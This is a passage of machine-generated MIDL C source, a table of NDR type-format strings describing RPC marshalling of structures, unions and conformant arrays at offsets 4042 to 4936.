/* 4042 */	NdrFcShort( 0xff9a ),	/* Offset= -102 (3940) */
/* 4044 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4046 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4048 */	NdrFcShort( 0x10 ),	/* 16 */
/* 4050 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4052 */	NdrFcShort( 0x6 ),	/* Offset= 6 (4058) */
/* 4054 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 4056 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 4058 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 4060 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (4004) */
/* 4062 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4064 */	NdrFcShort( 0x20 ),	/* 32 */
/* 4066 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4068 */	NdrFcShort( 0xa ),	/* Offset= 10 (4078) */
/* 4070 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4072 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4074 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4076 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 4078 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 4080 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 4082 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 4084 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4086 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 4088 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4090 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 4092 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 4094 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4098 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 4102 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 4106 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 4108 */	0x0 ,
			0x0,		/* 0 */
/* 4110 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4114 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4118 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 4120 */	NdrFcShort( 0xffc6 ),	/* Offset= -58 (4062) */
/* 4122 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4124 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4126 */	NdrFcShort( 0x10 ),	/* 16 */
/* 4128 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4130 */	NdrFcShort( 0x6 ),	/* Offset= 6 (4136) */
/* 4132 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 4134 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 4136 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 4138 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (4082) */
/* 4140 */
			0x11, 0x0,	/* FC_RP */
/* 4142 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4144) */
/* 4144 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 4146 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 4148 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 4150 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 4152 */	0x0 ,
			0x0,		/* 0 */
/* 4154 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4158 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4162 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4164) */
/* 4164 */	NdrFcShort( 0x30 ),	/* 48 */
/* 4166 */	NdrFcShort( 0x3 ),	/* 3 */
/* 4168 */	NdrFcLong( 0x1 ),	/* 1 */
/* 4172 */	NdrFcShort( 0x10 ),	/* Offset= 16 (4188) */
/* 4174 */	NdrFcLong( 0x2 ),	/* 2 */
/* 4178 */	NdrFcShort( 0x2e ),	/* Offset= 46 (4224) */
/* 4180 */	NdrFcLong( 0x3 ),	/* 3 */
/* 4184 */	NdrFcShort( 0x36 ),	/* Offset= 54 (4238) */
/* 4186 */	NdrFcShort( 0xffff ),	/* Offset= -1 (4185) */
/* 4188 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4190 */	NdrFcShort( 0x18 ),	/* 24 */
/* 4192 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4194 */	NdrFcShort( 0x8 ),	/* Offset= 8 (4202) */
/* 4196 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 4198 */	0x0,		/* 0 */
			NdrFcShort( 0xf3ed ),	/* Offset= -3091 (1108) */
			0x5b,		/* FC_END */
/* 4202 */
			0x11, 0x0,	/* FC_RP */
/* 4204 */	NdrFcShort( 0xf036 ),	/* Offset= -4042 (162) */
/* 4206 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4208 */	NdrFcShort( 0x28 ),	/* 40 */
/* 4210 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4212 */	NdrFcShort( 0x8 ),	/* Offset= 8 (4220) */
/* 4214 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 4216 */	0x0,		/* 0 */
			NdrFcShort( 0xf3eb ),	/* Offset= -3093 (1124) */
			0x5b,		/* FC_END */
/* 4220 */
			0x12, 0x0,	/* FC_UP */
/* 4222 */	NdrFcShort( 0xfff0 ),	/* Offset= -16 (4206) */
/* 4224 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4226 */	NdrFcShort( 0x28 ),	/* 40 */
/* 4228 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4230 */	NdrFcShort( 0x0 ),	/* Offset= 0 (4230) */
/* 4232 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 4234 */	NdrFcShort( 0xffe4 ),	/* Offset= -28 (4206) */
/* 4236 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4238 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4240 */	NdrFcShort( 0x30 ),	/* 48 */
/* 4242 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4244 */	NdrFcShort( 0x8 ),	/* Offset= 8 (4252) */
/* 4246 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 4248 */	NdrFcShort( 0xffd6 ),	/* Offset= -42 (4206) */
/* 4250 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 4252 */
			0x12, 0x0,	/* FC_UP */
/* 4254 */	NdrFcShort( 0xf9f8 ),	/* Offset= -1544 (2710) */
/* 4256 */
			0x11, 0x0,	/* FC_RP */
/* 4258 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4260) */
/* 4260 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 4262 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 4264 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 4266 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 4268 */	0x0 ,
			0x0,		/* 0 */
/* 4270 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4274 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4278 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4280) */
/* 4280 */	NdrFcShort( 0x40 ),	/* 64 */
/* 4282 */	NdrFcShort( 0x3 ),	/* 3 */
/* 4284 */	NdrFcLong( 0x1 ),	/* 1 */
/* 4288 */	NdrFcShort( 0x10 ),	/* Offset= 16 (4304) */
/* 4290 */	NdrFcLong( 0x2 ),	/* 2 */
/* 4294 */	NdrFcShort( 0x5a ),	/* Offset= 90 (4384) */
/* 4296 */	NdrFcLong( 0x3 ),	/* 3 */
/* 4300 */	NdrFcShort( 0x1f2 ),	/* Offset= 498 (4798) */
/* 4302 */	NdrFcShort( 0xffff ),	/* Offset= -1 (4301) */
/* 4304 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4306 */	NdrFcShort( 0x40 ),	/* 64 */
/* 4308 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4310 */	NdrFcShort( 0x0 ),	/* Offset= 0 (4310) */
/* 4312 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 4314 */	NdrFcShort( 0xef32 ),	/* Offset= -4302 (12) */
/* 4316 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 4318 */	NdrFcShort( 0xefa4 ),	/* Offset= -4188 (130) */
/* 4320 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4322 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4324 */	0x6,		/* FC_SHORT */
			0x3e,		/* FC_STRUCTPAD2 */
/* 4326 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4328 */
			0x15,		/* FC_STRUCT */
			0x3,		/* 3 */
/* 4330 */	NdrFcShort( 0x2c ),	/* 44 */
/* 4332 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 4334 */	NdrFcShort( 0xef1e ),	/* Offset= -4322 (12) */
/* 4336 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 4338 */	NdrFcShort( 0xef90 ),	/* Offset= -4208 (130) */
/* 4340 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4342 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 4344 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4346 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 4348 */	NdrFcShort( 0x1c ),	/* 28 */
/* 4350 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 4352 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 4354 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4358 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 4362 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 4366 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 4368 */	0x0 ,
			0x0,		/* 0 */
/* 4370 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4374 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4378 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 4380 */	NdrFcShort( 0xffcc ),	/* Offset= -52 (4328) */
/* 4382 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4384 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4386 */	NdrFcShort( 0x28 ),	/* 40 */
/* 4388 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4390 */	NdrFcShort( 0xc ),	/* Offset= 12 (4402) */
/* 4392 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 4394 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4396 */	0x8,		/* FC_LONG */
			0x6,		/* FC_SHORT */
/* 4398 */	0x3e,		/* FC_STRUCTPAD2 */
			0x8,		/* FC_LONG */
/* 4400 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 4402 */
			0x12, 0x0,	/* FC_UP */
/* 4404 */	NdrFcShort( 0xef6e ),	/* Offset= -4242 (162) */
/* 4406 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 4408 */	NdrFcShort( 0xffbe ),	/* Offset= -66 (4342) */
/* 4410 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 4412 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 4414 */	NdrFcShort( 0x8 ),	/* 8 */
/* 4416 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 4418 */	0x0 ,
			0x0,		/* 0 */
/* 4420 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4424 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4428 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4430) */
/* 4430 */	NdrFcShort( 0x10 ),	/* 16 */
/* 4432 */	NdrFcShort( 0x1 ),	/* 1 */
/* 4434 */	NdrFcLong( 0x1 ),	/* 1 */
/* 4438 */	NdrFcShort( 0x12e ),	/* Offset= 302 (4740) */
/* 4440 */	NdrFcShort( 0xffff ),	/* Offset= -1 (4439) */
/* 4442 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 4444 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 4446 */	NdrFcShort( 0x4 ),	/* 4 */
/* 4448 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 4450 */	0x0 ,
			0x0,		/* 0 */
/* 4452 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4456 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4460 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4462) */
/* 4462 */	NdrFcShort( 0x40 ),	/* 64 */
/* 4464 */	NdrFcShort( 0x7 ),	/* 7 */
/* 4466 */	NdrFcLong( 0x1 ),	/* 1 */
/* 4470 */	NdrFcShort( 0x4e ),	/* Offset= 78 (4548) */
/* 4472 */	NdrFcLong( 0x2 ),	/* 2 */
/* 4476 */	NdrFcShort( 0x5c ),	/* Offset= 92 (4568) */
/* 4478 */	NdrFcLong( 0x3 ),	/* 3 */
/* 4482 */	NdrFcShort( 0xe2 ),	/* Offset= 226 (4708) */
/* 4484 */	NdrFcLong( 0x4 ),	/* 4 */
/* 4488 */	NdrFcShort( 0xee ),	/* Offset= 238 (4726) */
/* 4490 */	NdrFcLong( 0x5 ),	/* 5 */
/* 4494 */	NdrFcShort( 0xe8 ),	/* Offset= 232 (4726) */
/* 4496 */	NdrFcLong( 0x6 ),	/* 6 */
/* 4500 */	NdrFcShort( 0xe2 ),	/* Offset= 226 (4726) */
/* 4502 */	NdrFcLong( 0x7 ),	/* 7 */
/* 4506 */	NdrFcShort( 0xdc ),	/* Offset= 220 (4726) */
/* 4508 */	NdrFcShort( 0xffff ),	/* Offset= -1 (4507) */
/* 4510 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4512 */	NdrFcShort( 0x28 ),	/* 40 */
/* 4514 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4516 */	NdrFcShort( 0x0 ),	/* Offset= 0 (4516) */
/* 4518 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4520 */	0x8,		/* FC_LONG */
			0x6,		/* FC_SHORT */
/* 4522 */	0x3e,		/* FC_STRUCTPAD2 */
			0x8,		/* FC_LONG */
/* 4524 */	0x8,		/* FC_LONG */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 4526 */	0x0,		/* 0 */
			NdrFcShort( 0xf221 ),	/* Offset= -3551 (976) */
			0x5b,		/* FC_END */
/* 4530 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4532 */	NdrFcShort( 0x30 ),	/* 48 */
/* 4534 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4536 */	NdrFcShort( 0x8 ),	/* Offset= 8 (4544) */
/* 4538 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 4540 */	0x0,		/* 0 */
			NdrFcShort( 0xffe1 ),	/* Offset= -31 (4510) */
			0x5b,		/* FC_END */
/* 4544 */
			0x12, 0x0,	/* FC_UP */
/* 4546 */	NdrFcShort( 0xfff0 ),	/* Offset= -16 (4530) */
/* 4548 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4550 */	NdrFcShort( 0x40 ),	/* 64 */
/* 4552 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4554 */	NdrFcShort( 0xa ),	/* Offset= 10 (4564) */
/* 4556 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 4558 */	0x40,		/* FC_STRUCTPAD4 */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 4560 */	0x0,		/* 0 */
			NdrFcShort( 0xffe1 ),	/* Offset= -31 (4530) */
			0x5b,		/* FC_END */
/* 4564 */
			0x12, 0x0,	/* FC_UP */
/* 4566 */	NdrFcShort( 0xeecc ),	/* Offset= -4404 (162) */
/* 4568 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4570 */	NdrFcShort( 0x18 ),	/* 24 */
/* 4572 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4574 */	NdrFcShort( 0xa ),	/* Offset= 10 (4584) */
/* 4576 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4578 */	0x8,		/* FC_LONG */
			0x6,		/* FC_SHORT */
/* 4580 */	0x3e,		/* FC_STRUCTPAD2 */
			0x36,		/* FC_POINTER */
/* 4582 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4584 */
			0x12, 0x0,	/* FC_UP */
/* 4586 */	NdrFcShort( 0xeeb8 ),	/* Offset= -4424 (162) */
/* 4588 */
			0x15,		/* FC_STRUCT */
			0x1,		/* 1 */
/* 4590 */	NdrFcShort( 0x4 ),	/* 4 */
/* 4592 */	0x2,		/* FC_CHAR */
			0x2,		/* FC_CHAR */
/* 4594 */	0x6,		/* FC_SHORT */
			0x5b,		/* FC_END */
/* 4596 */
			0x1c,		/* FC_CVARRAY */
			0x1,		/* 1 */
/* 4598 */	NdrFcShort( 0x2 ),	/* 2 */
/* 4600 */	0x17,		/* Corr desc:  field pointer, FC_USHORT */
			0x55,		/* FC_DIV_2 */
/* 4602 */	NdrFcShort( 0x2 ),	/* 2 */
/* 4604 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 4606 */	0x0 ,
			0x0,		/* 0 */
/* 4608 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4612 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4616 */	0x17,		/* Corr desc:  field pointer, FC_USHORT */
			0x55,		/* FC_DIV_2 */
/* 4618 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4620 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 4622 */	0x0 ,
			0x0,		/* 0 */
/* 4624 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4628 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4632 */	0x5,		/* FC_WCHAR */
			0x5b,		/* FC_END */
/* 4634 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4636 */	NdrFcShort( 0x10 ),	/* 16 */
/* 4638 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4640 */	NdrFcShort( 0x8 ),	/* Offset= 8 (4648) */
/* 4642 */	0x6,		/* FC_SHORT */
			0x6,		/* FC_SHORT */
/* 4644 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 4646 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4648 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 4650 */	NdrFcShort( 0xffca ),	/* Offset= -54 (4596) */
/* 4652 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4654 */	NdrFcShort( 0x10 ),	/* 16 */
/* 4656 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4658 */	NdrFcShort( 0x6 ),	/* Offset= 6 (4664) */
/* 4660 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 4662 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4664 */
			0x12, 0x0,	/* FC_UP */
/* 4666 */	NdrFcShort( 0xfff2 ),	/* Offset= -14 (4652) */
/* 4668 */
			0x12, 0x0,	/* FC_UP */
/* 4670 */	NdrFcShort( 0xffdc ),	/* Offset= -36 (4634) */
/* 4672 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4674 */	NdrFcShort( 0x30 ),	/* 48 */
/* 4676 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4678 */	NdrFcShort( 0x12 ),	/* Offset= 18 (4696) */
/* 4680 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 4682 */	0x0,		/* 0 */
			NdrFcShort( 0xffa1 ),	/* Offset= -95 (4588) */
			0x6,		/* FC_SHORT */
/* 4686 */	0x6,		/* FC_SHORT */
			0x6,		/* FC_SHORT */
/* 4688 */	0x6,		/* FC_SHORT */
			0x40,		/* FC_STRUCTPAD4 */
/* 4690 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 4692 */	0x8,		/* FC_LONG */
			0x2,		/* FC_CHAR */
/* 4694 */	0x3f,		/* FC_STRUCTPAD3 */
			0x5b,		/* FC_END */
/* 4696 */
			0x12, 0x0,	/* FC_UP */
/* 4698 */	NdrFcShort( 0xee48 ),	/* Offset= -4536 (162) */
/* 4700 */
			0x12, 0x0,	/* FC_UP */
/* 4702 */	NdrFcShort( 0xffce ),	/* Offset= -50 (4652) */
/* 4704 */
			0x12, 0x0,	/* FC_UP */
/* 4706 */	NdrFcShort( 0xffde ),	/* Offset= -34 (4672) */
/* 4708 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4710 */	NdrFcShort( 0x40 ),	/* 64 */
/* 4712 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4714 */	NdrFcShort( 0x0 ),	/* Offset= 0 (4714) */
/* 4716 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4718 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 4720 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 4722 */	NdrFcShort( 0xffce ),	/* Offset= -50 (4672) */
/* 4724 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4726 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4728 */	NdrFcShort( 0x10 ),	/* 16 */
/* 4730 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4732 */	NdrFcShort( 0x0 ),	/* Offset= 0 (4732) */
/* 4734 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4736 */	0x8,		/* FC_LONG */
			0x6,		/* FC_SHORT */
/* 4738 */	0x3e,		/* FC_STRUCTPAD2 */
			0x5b,		/* FC_END */
/* 4740 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4742 */	NdrFcShort( 0x10 ),	/* 16 */
/* 4744 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4746 */	NdrFcShort( 0x6 ),	/* Offset= 6 (4752) */
/* 4748 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4750 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 4752 */
			0x12, 0x0,	/* FC_UP */
/* 4754 */	NdrFcShort( 0xfec8 ),	/* Offset= -312 (4442) */
/* 4756 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 4758 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4760 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 4762 */	NdrFcShort( 0x18 ),	/* 24 */
/* 4764 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 4766 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 4768 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4772 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 4776 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 4780 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 4782 */	0x0 ,
			0x0,		/* 0 */
/* 4784 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4788 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4792 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 4794 */	NdrFcShort( 0xfe2e ),	/* Offset= -466 (4328) */
/* 4796 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4798 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4800 */	NdrFcShort( 0x28 ),	/* 40 */
/* 4802 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4804 */	NdrFcShort( 0xa ),	/* Offset= 10 (4814) */
/* 4806 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 4808 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 4810 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 4812 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 4814 */
			0x12, 0x0,	/* FC_UP */
/* 4816 */	NdrFcShort( 0xedd2 ),	/* Offset= -4654 (162) */
/* 4818 */
			0x12, 0x0,	/* FC_UP */
/* 4820 */	NdrFcShort( 0xfe66 ),	/* Offset= -410 (4410) */
/* 4822 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 4824 */	NdrFcShort( 0xffbc ),	/* Offset= -68 (4756) */
/* 4826 */
			0x11, 0x0,	/* FC_RP */
/* 4828 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4830) */
/* 4830 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 4832 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 4834 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 4836 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 4838 */	0x0 ,
			0x0,		/* 0 */
/* 4840 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4844 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4848 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4850) */
/* 4850 */	NdrFcShort( 0x8 ),	/* 8 */
/* 4852 */	NdrFcShort( 0x1 ),	/* 1 */
/* 4854 */	NdrFcLong( 0x1 ),	/* 1 */
/* 4858 */	NdrFcShort( 0x4 ),	/* Offset= 4 (4862) */
/* 4860 */	NdrFcShort( 0xffff ),	/* Offset= -1 (4859) */
/* 4862 */
			0x15,		/* FC_STRUCT */
			0x3,		/* 3 */
/* 4864 */	NdrFcShort( 0x8 ),	/* 8 */
/* 4866 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 4868 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 4870 */
			0x11, 0x0,	/* FC_RP */
/* 4872 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4874) */
/* 4874 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 4876 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 4878 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 4880 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 4882 */	0x0 ,
			0x0,		/* 0 */
/* 4884 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4888 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4892 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4894) */
/* 4894 */	NdrFcShort( 0x40 ),	/* 64 */
/* 4896 */	NdrFcShort( 0x2 ),	/* 2 */
/* 4898 */	NdrFcLong( 0x1 ),	/* 1 */
/* 4902 */	NdrFcShort( 0xa ),	/* Offset= 10 (4912) */
/* 4904 */	NdrFcLong( 0x2 ),	/* 2 */
/* 4908 */	NdrFcShort( 0x18 ),	/* Offset= 24 (4932) */
/* 4910 */	NdrFcShort( 0xffff ),	/* Offset= -1 (4909) */
/* 4912 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4914 */	NdrFcShort( 0x20 ),	/* 32 */
/* 4916 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4918 */	NdrFcShort( 0xa ),	/* Offset= 10 (4928) */
/* 4920 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 4922 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 4924 */	0x0,		/* 0 */
			NdrFcShort( 0xeccf ),	/* Offset= -4913 (12) */
			0x5b,		/* FC_END */
/* 4928 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 4930 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 4932 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 4934 */	NdrFcShort( 0x40 ),	/* 64 */
/* 4936 */	NdrFcShort( 0x0 ),	/* 0 */
